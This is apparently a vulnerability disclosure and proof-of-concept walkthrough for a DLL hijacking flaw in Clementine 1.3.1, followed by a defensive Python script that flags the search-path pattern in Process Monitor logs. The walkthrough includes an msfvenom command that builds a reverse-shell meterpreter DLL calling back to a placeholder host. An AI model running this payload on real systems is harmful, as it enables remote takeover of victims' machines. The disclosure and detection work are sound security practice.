An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)

riftsandroses/CVE-2024-50986


CVE-2024-50986: DLL Hijacking Exploit for Clementine

Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

Version Affected: Clementine v.1.3.1

Researcher: Utkarsh (r1971d3) LinkedIn

NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Vulnerability Type: Untrusted Search Path

Affected Component: QUSEREX.DLL

Proof-of-Concept Exploit

Attack Vector

To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory C:\Users\<username>\AppData\Local\Microsoft\WindowsApps. When the Clementine application is launched, it loads the malicious DLL and executes the attacker's code.

Description & Usage

  1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine searches for them within the Windows operating system.

  [Screenshot: Capture_3]

  2. The search reveals that the DLL "QUSEREX.DLL" is looked for in multiple locations, including C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\

  [Screenshot: Capture_4]

  3. A malicious DLL is created using msfvenom with the following command:

     sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

  [Screenshot: Capture_5]

  4. This malicious DLL is placed in the directory C:\Users\<username>\AppData\Local\Microsoft\WindowsApps, where it is successfully loaded by Clementine.

  [Screenshot: Capture_6]

  5. Using msfconsole, the staged payload is delivered over the reverse TCP connection, and a meterpreter session is obtained with its working directory at C:\Program Files (x86)\Clementine\projectm-presets on the target machine.

  [Screenshot: Capture_7]

  [Screenshot: Capture_8]
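The Process Monitor triage in steps 1 and 2 is the part of this write-up a defender can reuse: the tell-tale pattern is a process probing for a DLL under a user-writable directory (NAME NOT FOUND), and the tell-tale sign of exploitation is the same process actually opening a DLL from such a directory (SUCCESS). The script below is an added example, not code from this repository or from the Clementine project. It parses a Process Monitor CSV export (File > Save > CSV, whose default columns are used here) and reports both patterns for a chosen process. The CSV rows, the user name "alice" and the PIDs are constructed for the example.

```python
import csv
import io
import sys

# Constructed sample in Process Monitor's default CSV export layout
# (not a real capture; paths under C:\Users\alice are made up).
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.100","clementine.exe","4120","CreateFile","C:\\Program Files (x86)\\Clementine\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.101","clementine.exe","4120","CreateFile","C:\\Windows\\System32\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.102","clementine.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.103","clementine.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.104","clementine.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\QUSEREX.DLL","SUCCESS","Desired Access: Execute/Traverse"
"10:01:02.105","explorer.exe","1234","CreateFile","C:\\Users\\alice\\Desktop\\notes.txt","SUCCESS","Desired Access: Generic Read"
"""

# Directory prefixes a standard user can write to. Extend for your environment
# (e.g. a writable ProgramData subfolder); compared case-insensitively.
USER_WRITABLE_PREFIXES = ("c:\\users\\",)


def parse_procmon_csv(text):
    """Return the rows of a Process Monitor CSV export as dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def is_user_writable(path):
    """True if the path lies under a directory prefix we treat as user-writable."""
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def find_dll_search_path_findings(rows, process_name="clementine.exe"):
    """Triage CreateFile events of one process for DLL search-path abuse.

    Returns a dict with two keys:
      hijackable           -> {DLL name: [user-writable dirs where it was NOT found]}
      loaded_from_user_path -> [(DLL name, full path)] for DLLs opened successfully
                               from a user-writable directory
    """
    hijackable = {}
    loaded = []
    for row in rows:
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or not is_user_writable(path):
            continue
        directory, _, name = path.rpartition("\\")
        name = name.upper()
        if row["Result"] == "NAME NOT FOUND":
            dirs = hijackable.setdefault(name, [])
            if directory not in dirs:
                dirs.append(directory)
        elif row["Result"] == "SUCCESS":
            loaded.append((name, path))
    return {"hijackable": hijackable, "loaded_from_user_path": loaded}


def format_report(findings):
    """Render the findings as human-readable lines."""
    lines = []
    for name, dirs in findings["hijackable"].items():
        for d in dirs:
            lines.append(f"HIJACKABLE  {name} probed but missing in user-writable dir: {d}")
    for name, path in findings["loaded_from_user_path"]:
        lines.append(f"LOADED      {name} opened from user-writable path: {path}")
    if not lines:
        lines.append("No DLL search-path findings.")
    return lines


if __name__ == "__main__":
    # Usage: python triage_procmon.py [export.csv] [process_name]
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_PROCMON_CSV
    proc = sys.argv[2] if len(sys.argv) > 2 else "clementine.exe"
    for line in format_report(find_dll_search_path_findings(parse_procmon_csv(text), proc)):
        print(line)
```

A HIJACKABLE line is the precondition the write-up describes (the application checks a user-writable folder before giving up); a LOADED line is evidence the precondition has been used. The WindowsApps folder appears in every user's PATH by default, which is why it shows up in the DLL search order here; the fix on the application side is to load dependencies by full path or restrict the search with SetDefaultDllDirectories.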
